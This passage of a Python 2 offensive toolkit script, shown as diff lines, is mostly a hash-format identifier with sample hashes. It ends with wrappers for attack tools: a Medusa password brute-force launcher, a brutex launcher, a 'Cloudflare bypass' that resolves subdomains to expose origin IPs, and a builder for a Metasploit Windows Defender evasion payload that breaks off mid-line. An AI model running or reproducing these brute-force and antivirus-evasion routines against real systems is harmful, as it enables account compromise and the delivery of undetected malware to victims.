hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename 